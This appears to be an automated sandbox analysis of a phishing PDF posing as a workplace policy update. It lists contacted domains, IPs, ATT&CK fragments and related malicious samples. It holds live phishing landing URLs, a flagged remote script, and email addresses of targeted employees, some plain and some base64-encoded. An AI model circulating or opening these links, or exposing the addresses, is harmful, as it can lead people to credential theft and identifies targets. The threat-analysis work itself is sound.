        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfInitial sample: PDF keyword /JS count = 0
        Source: Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfInitial sample: PDF keyword /JavaScript count = 0
        Source: Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        System Information Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/0%Avira URL Cloudsafe
        https://www.larkus.ao/animal/script.js0%Avira URL Cloudsafe
        https://roadmap27.github.io/favicon.ico0%Avira URL Cloudsafe
        https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/image/logo.png0%Avira URL Cloudsafe
        https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/style.css0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        roadmap27.github.io
        185.199.108.153
        truetrue
          unknown
          d26p066pn2w0s0.cloudfront.net
          13.227.8.64
          truefalse
            unknown
            bg.microsoft.map.fastly.net
            199.232.214.172
            truefalse
              high
              ipapi.co
              172.67.69.226
              truefalse
                high
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  high
                  larkus.ao
                  65.109.232.106
                  truetrue
                    unknown
                    cdnjs.cloudflare.com
                    104.17.24.14
                    truefalse
                      high
                      www.google.com
                      142.250.181.132
                      truefalse
                        high
                        api.ipify.org
                        172.67.74.152
                        truefalse
                          high
                          x1.i.lencr.org
                          unknown
                          unknownfalse
                            high
                            www.larkus.ao
                            unknown
                            unknownfalse
                              high
                              logo.clearbit.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/#c2JpZHppbnNraUBoYXJyaXNhc3NvYy5jb20=true
                                  unknown
                                  https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/style.cssfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.ipify.org/?format=jsonfalse
                                    high
                                    https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://logo.clearbit.com/harrisassoc.com?size=400false
                                      high
                                      https://a.nel.cloudflare.com/report/v4?s=Fu4V4TG6pcEcLP8N1pZSWTSNKKsjlofmYQ89bvK44sfdvgwfr3K6U7BPoECUrMEUVlbA17LN8lODsZVj6SELNl0hC6%2FUE0AjCso%2FLmSysGWk%2FusC9hyJJQpDO13B8OwsI5zl4Gpdfalse
                                        high
                                        https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/image/logo.pngfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ipapi.co/json/false
                                          high
                                          https://roadmap27.github.io/favicon.icofalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.cssfalse
                                            high
                                            https://www.larkus.ao/animal/script.jstrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2false
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://fontawesome.comchromecache_178.5.drfalse
                                                high
                                                http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
                                                  high
                                                  https://twitter.com/githubstatuschromecache_176.5.drfalse
                                                    high
                                                    https://githubstatus.comchromecache_176.5.drfalse
                                                      high
                                                      https://help.github.com/pages/chromecache_176.5.drfalse
                                                        high
                                                        https://fontawesome.com/license/freechromecache_178.5.drfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          142.250.181.132
                                                          www.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          65.109.232.106
                                                          larkus.aoUnited States
                                                          11022ALABANZA-BALTUStrue
                                                          35.190.80.1
                                                          a.nel.cloudflare.comUnited States
                                                          15169GOOGLEUSfalse
                                                          172.67.69.226
                                                          ipapi.coUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          104.17.24.14
                                                          cdnjs.cloudflare.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          104.26.12.205
                                                          unknownUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          239.255.255.250
                                                          unknownReserved
                                                          unknownunknownfalse
                                                          13.227.8.64
                                                          d26p066pn2w0s0.cloudfront.netUnited States
                                                          16509AMAZON-02USfalse
                                                          185.199.108.153
                                                          roadmap27.github.ioNetherlands
                                                          54113FASTLYUStrue
                                                          172.67.74.152
                                                          api.ipify.orgUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          IP
                                                          192.168.2.16
                                                          192.168.2.4
                                                          192.168.2.6
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1577087
                                                          Start date and time:2024-12-18 00:27:39 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 32s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:defaultwindowspdfcookbook.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:12
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf
                                                          Detection:MAL
                                                          Classification:mal56.phis.winPDF@28/77@27/13
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .pdf
                                                          • Found PDF document
                                                          • Close Viewer
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 2.20.60.204, 162.159.61.3, 172.64.41.3, 172.217.21.35, 64.233.164.84, 172.217.17.78, 23.32.238.130, 2.19.198.75, 52.22.41.97, 3.233.129.217, 52.6.155.20, 3.219.243.226, 172.217.17.46, 23.195.39.65, 199.232.214.172, 23.195.60.171, 192.229.221.95, 172.217.17.35, 23.206.103.35, 52.149.20.212, 172.202.163.200, 13.107.246.63
                                                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, clients1.google.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf
                                                          TimeTypeDescription
                                                          18:28:41API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                          SourceURL
                                                          Screenshothttps://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/#c2JpZHppbnNraUBoYXJyaXNhc3NvYy5jb20=
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          65.109.232.106https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                            Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                              Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                                                                • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                                                                http://vtaurl.comGet hashmaliciousUnknownBrowse
                                                                • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                                                http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                                                • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                                                104.26.12.205jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                                • api.ipify.org/?format=text
                                                                xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                                                • api.ipify.org/
                                                                GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                • api.ipify.org/
                                                                8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                                • api.ipify.org/
                                                                Simple2.exeGet hashmaliciousUnknownBrowse
                                                                • api.ipify.org/
                                                                Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                • api.ipify.org/
                                                                Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                • api.ipify.org/
                                                                6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                • api.ipify.org/
                                                                perfcc.elfGet hashmaliciousXmrigBrowse
                                                                • api.ipify.org/
                                                                SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                • api.ipify.org/
                                                                172.67.69.226https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                  https://buiseenet-fbsp247.getresponsewebsite.com/Get hashmaliciousUnknownBrowse
                                                                    Employee_Bonus_Notlce.pdfGet hashmaliciousUnknownBrowse
                                                                      https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29tGet hashmaliciousUnknownBrowse
                                                                        https://www.google.co.ls/amp/s/2mzptv.s3.us-east-1.amazonaws.com/qr.htmlGet hashmaliciousUnknownBrowse
                                                                          https://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                                            https://www.google.ca/url?q=30NUMBER&rct=44304277659948745221&sa=t&url=amp/s/estudioit.cl/starl/%23YmhpbmVzQGlubm92aWEuY29tGet hashmaliciousUnknownBrowse
                                                                              https://estudioit.cl/starl/#ZGVicmEuY2FydGVyQGNhc2EuZ292LmF1Get hashmaliciousUnknownBrowse
                                                                                bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                                                  ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    ipapi.cohttps://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpub-c51a5b71098c4a50b29ad0816d037292.r2.dev%2525252Findex.html%25252F1FPh%25252FkO25AQ%25252FAQ%25252F3e065842-509e-4fd5-abbb-5283a8ac4086%25252F1%25252FRkloQ4shWG%252F1FPh%252Fk_25AQ%252FAQ%252Fdde43c95-583c-418a-adc0-08f493a126f6%252F1%252FJb7OErMoyM%2F1FPh%2Fk_25AQ%2FAQ%2Fb4b83026-0c0f-44d4-9e59-6245afb2c831%2F1%2F0MDiG0XvGK/1FPh/le25AQ/AQ/97716a3f-8a20-4219-bc1f-a50876348ddc/1/HkaU6VJ0d2#Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.16.1
                                                                                    https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.comGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.9.44
                                                                                    Codale Electric Supply Health Insurance Benefits Open Enrollment Plan.html.shtmlGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.9.44
                                                                                    https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.8.44
                                                                                    Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.8.44
                                                                                    Carisls Open Benefits Enrollment.emlGet hashmaliciousunknownBrowse
                                                                                    • 104.26.9.44
                                                                                    Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.9.44
                                                                                    PQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                    • 104.26.8.44
                                                                                    https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.9.44
                                                                                    https://buiseenet-fbsp247.getresponsewebsite.com/Get hashmaliciousUnknownBrowse
                                                                                    • 104.26.8.44
                                                                                    d26p066pn2w0s0.cloudfront.nethttps://artsofbristy.com/?data=ZGdyaW5zdGVhZEBjaXR5b2Zyb3hib3JvLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                    • 13.227.8.64
                                                                                    https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.227.8.72
                                                                                    Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.227.8.47
                                                                                    https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.227.8.64
                                                                                    https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.227.8.65
                                                                                    Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.227.8.72
                                                                                    https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.227.8.47
                                                                                    https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.227.8.72
                                                                                    https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.227.8.72
                                                                                    http://url969.uniteddeleverycompany.com/ls/click?upn=u001.H7qy8CwvNpiem-2Bf7DeMFk7YJf68sOidxEWakApUPIOSZg2OY8dbdpgPNdKDwG5r9FFRxGTcDR4Y40gkedjWn5gmaEy2hdp5PhuemKZpyV0zDF4yZB1nSDE1glVUHkAxvk-2Bay1ScD58FIOgYpgYP6N0ScK3-2BfYjxiyiX8IVVnDpwETyB9eFyZIpVwHB3s73fG91OsUU5I5qElZ5zc-2F019KUvyyM6RxeXMegmcNjDutTA-2FnxufBtCMFX4wRkoDOM-2BzzsCiJIoY1mc9q42wLMHiq-2B4vv2-2FqoR1f2l-2BCmuACM5q-2FNbDZQstkQL5-2FH30fC7m19Rn-2BlXgwexRgjH0XwyNE8I2tRC8iv5uAUiLQk1AD6k0bLjsvdQWk9bfnh9YPL7n6nCIBdvs55pyxgyRAhb2C3g-3D-3DzLOu_oNIH2-2FxJ-2FTe1FaVJ1jWIKVy-2BRH8quBB-2F7-2FAZY1zuBa8sYO3A2kRlNC5SRLFjReRDbNAqQc8ija5eyvb3hMHW2LijdhuT99ojcYbvfeVDR6TjM8Iqq-2F4lpz7WKfkjLfs8kULSyk-2BJ2FHXElRwIq2EjJuur8G9AAw0HjpCQ3JV-2F1d4REvZ-2BdaWGeRZa46RgdqnKhZwT4HPC-2Fcr9dZBwLnURfD1x7OZfW9R3B1ZDWRdH1V-2F-2BR-2FWmM6h4NEHHRb9NNBhFNZPaY6piFBOFNOupA2OrFLOTElocKhsbRyDVGAbiBMte7-2BAjR-2BA2H-2F9CP2UREBvDHXsH-2BmlqvAryDrKjjAy8lTbA9nho9WLS1JKeGns5pAqmjv-2FPH8p3m8V8tFEPj2WLqfG6IzXwKcOMYvSrGYkMWMsBKmgc-2Bt-2BOg9a0jxMR-2BByynWcTgKhB44PNmoRQfd9lvEhtXtJnUleVDwJMZbPw60p1K6oxTexhzM9ScXx7kCprkCgMgcfi8rgis43afOn4xM8YRcMg9tIzu64CU7VuKJ-2BMFN5I78-2B8KPrNOjHK5o6ri9rwGpR8XbmEC-2BUi0PISrd7M-2BHCYWlP2o1TBL2OAmqufIzKPL-2F0NYk7NCFq-2BQEFmracNk-2BqqlMZ00PhqEs2JN98lsOxQ6MUbXZMcj-2FhqVBZVN97wkN60D56kJ-2FOQiaa7gW2IP4afUKBiy9Wl-2B0h0QTfxVEz3DZUlxRmNpooAbQL5Uk9Km4liDjAnP-2F9rKBZSc3OZEf33ZNLDn8jMDI2p9XCpZ-2BdDlLCTUAgCLNK0FE-2BJVvF9LYHxIrcC8tpkLszOdDeZHX2xcWm6Lc3y7tQCdb1uaEkAxyHmalygulTA8ODCE0Qj21BBKduU8fdD8C7u4Nqc-2BpJjM-2FhEfOBaq9vq0rNhSs4OVsJ7hESECV5WQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 18.161.111.117
                                                                                    bg.microsoft.map.fastly.netsupport.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 199.232.214.172
                                                                                    5.msiGet hashmaliciousDanaBot, NitolBrowse
                                                                                    • 199.232.214.172
                                                                                    file.exeGet hashmaliciousRemcosBrowse
                                                                                    • 199.232.214.172
                                                                                    https://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                    • 199.232.210.172
                                                                                    lavita.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                    • 199.232.210.172
                                                                                    mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 199.232.214.172
                                                                                    uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                                                    • 199.232.210.172
                                                                                    Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                                                    • 199.232.210.172
                                                                                    Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                                                    • 199.232.210.172
                                                                                    Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    • 199.232.214.172
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUShades.exeGet hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                    • 104.21.23.76
                                                                                    https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                                                                                    • 104.16.123.96
                                                                                    https://technicalwriterhq.com/Get hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=temadewelgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%6D%6F%74%6C%65%79%2D%61%6D%65%6E%61%62%6C%65%2D%73%74%69%6E%67%2E%67%6C%69%74%63%68%2E%6D%65#Y2hhbmd5ZW9sLmNob2lAaHl1bmRhaWVsZXZhdG9yLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                    • 104.23.168.53
                                                                                    loader.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.151.119
                                                                                    support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 104.21.64.1
                                                                                    https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpub-c51a5b71098c4a50b29ad0816d037292.r2.dev%2525252Findex.html%25252F1FPh%25252FkO25AQ%25252FAQ%25252F3e065842-509e-4fd5-abbb-5283a8ac4086%25252F1%25252FRkloQ4shWG%252F1FPh%252Fk_25AQ%252FAQ%252Fdde43c95-583c-418a-adc0-08f493a126f6%252F1%252FJb7OErMoyM%2F1FPh%2Fk_25AQ%2FAQ%2Fb4b83026-0c0f-44d4-9e59-6245afb2c831%2F1%2F0MDiG0XvGK/1FPh/le25AQ/AQ/97716a3f-8a20-4219-bc1f-a50876348ddc/1/HkaU6VJ0d2#Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.57.143
                                                                                    CLOUDFLARENETUShades.exeGet hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                    • 104.21.23.76
                                                                                    https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                                                                                    • 104.16.123.96
                                                                                    https://technicalwriterhq.com/Get hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
